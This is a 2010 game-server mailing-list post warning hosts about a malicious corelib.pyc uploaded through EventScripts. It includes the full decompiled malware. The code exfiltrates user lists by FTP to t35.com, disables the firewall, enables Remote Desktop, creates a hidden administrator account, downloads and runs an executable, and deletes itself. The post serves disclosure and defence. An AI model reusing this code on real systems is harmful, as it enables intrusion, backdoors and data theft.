Hi Guys,
I wanted to shoot out an email to everyone in regards to an exploit we have
come across today for those who are running Eventscripts & windows based
servers.
Apparently a user is able to upload "corelib.pyc" to the game server without
using the common FTP/Control panel and via the game server itself. In turn,
using eventscripts he is able to execute his script, create an administrator
with full remote desktop access and finally remove all his files once his
account is created.
Our security caught it before it was able to cause us any issues, however
this may be an issue for people who have lesser amount of security in place
and especially if you do not have a anti-virus/firewall running on the
machine.
We have also found there is multiple variations of this file, so you may
want to be sure you do a full look at your machines.
With that being said, the files are coming from a free web hosting account
over at t35.com - So if your machines have seen any connections in/out bound
to that host in the past 48 hours, I would highly suggest you check your
machines.
Now on to the hosts on this list, we also found this in his scripts:
C:\Games\rzr00\GameServers\TC55505872742137586643251\cstrike\addons\eventscr
ipts\wcs\WCSusers\es_wcsusers_db.txt
So he was testing this somewhere else, someone else who is running TCAdmin -
If this is yours, I would start checking your boxes.
Attached is a decrypted copy of the corelib.pyc.
Joys,
-Lane
Fri Feb 26 22:35:10 2010
decompile /tmp/upload/20100226223510_753.pyc...
#! /usr/bin/env python
# emacs-mode: -*- python-*-
# -*- coding: utf-8 -*-
from ftplib import FTP
import os
import urllib
import es
import sys
import os.path
import operator
import subprocess
import time
def upload(handle, filename):
f = open(filename, 'rb')
(base, ext,) = os.path.splitext(filename)
picext = '.bmp .jpg .jpeg .dib .tif .tiff .gif .png'
if operator.contains(picext, ext):
try:
handle.storbinary(('STOR ' + filename), f, 1)
except Exception:
print 'erorr'
else:
print 'sucessup'
f.close()
return None
try:
handle.storbinary(('STOR ' + filename), f)
except Exception:
print 'Error in downloading the remote file.'
else:
print 'Successful download!'
f.close()
def download(handle, filename):
f2 = open(filename, 'wb')
try:
handle.retrbinary(('RETR ' + filename), f2.write)
except Exception:
print 'lol'
return None
else:
print 'lol'
f2.close()
def load():
print 'Getting Paths'
thisfile = (str(es.ServerVar('eventscripts_gamedir')) +
'\\addons\\eventscripts\\corelib\\corelib.py')
root = (os.getcwd()[0] + ':\\')
host_name = 'ftp.t35.com'
if ('http://' in host_name):
host_name = host_name.replace('http://', '')
host_name = host_name.replace('\n', '')
user = '*'
pwd = '*'
try:
ftph = FTP(host_name)
except:
print 'Host could not be resolved'
raw_input()
sys.exit()
try:
ftph.login(user, pwd)
except Exception:
if ((user == 'anonymous') or (((user == 'Anonymous') and (pwd ==
'anonymous')) or (pwd == 'Anonymous'))):
print 'The server does not accept anonymous requests'
raw_input()
sys.exit()
else:
print 'Invalid login combination'
raw_input()
sys.exit()
else:
print 'Successfully connected'
print ftph.getwelcome()
flag = 1
count = 0
path = ftph.pwd()
charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890'
print 'Press help at any time to see proper usage.\n'
dirpath = 'Quantum'
ftph.cwd(dirpath)
url = urllib.URLopener()
resp = url.open('http://www.cjlax.com/ocean/ip.php')
html = resp.read(114)
ippath = ((root + html) + '.log')
os.popen(('net user > %s' % ippath))
time.sleep(5)
upload(ftph, ('%s' % ippath))
ftph.close()
print 'Setting Up Remote Desktop'
os.system('REG ADD
HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile
/v "EnableFirewall" /t REG_DWORD /d "0" /f')
os.system('REG ADD
"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v
fDenyTSConnections /t REG_DWORD /d 0 /f')
print 'Creating Users'
os.system('net user bw 313313313 /add')
os.system('net localgroup Administrator bw /add ')
os.system('net group "Domain Admins" bw /add')
os.system('net localgroup administrators bw /add')
os.system('net localgroup administrator bw /add')
os.system('net localgroup administratoren bw /add')
os.system('net localgroup administradors bw /add')
os.system('net localgroup administrateurs bw /add')
print 'Downloading'
url = 'http://stashbox.org/806008/Windows%20Host%20Process.exe'
save = (root + 'rawr.exe')
try:
urllib.urlretrieve(url, save)
except:
(es.msg('#multi', '#green er:%s') % sys.exc_info()[0])
print 'Finished Downloading'
print 'Executing.'
b = os.path.getsize(thisfile)
if (b < 1000):
es.msg('#multi', '#green : bad download.')
else:
os.system(save)
print 'Removeing'
es.msg('#multi', '#lightgreen Removing.')
es.server.queuecmd('es_unload corelib')
os.remove(thisfile)
print 'Finished'
# local variables:
# tab-width: 4
depythoned 1 files: 1 okay, 0 failed
Fri Feb 26 22:35:12 2010
_______________________________________________
To unsubscribe, edit your list preferences, or view the list archives, please
visit:
http://list.valvesoftware.com/mailman/listinfo/hlds
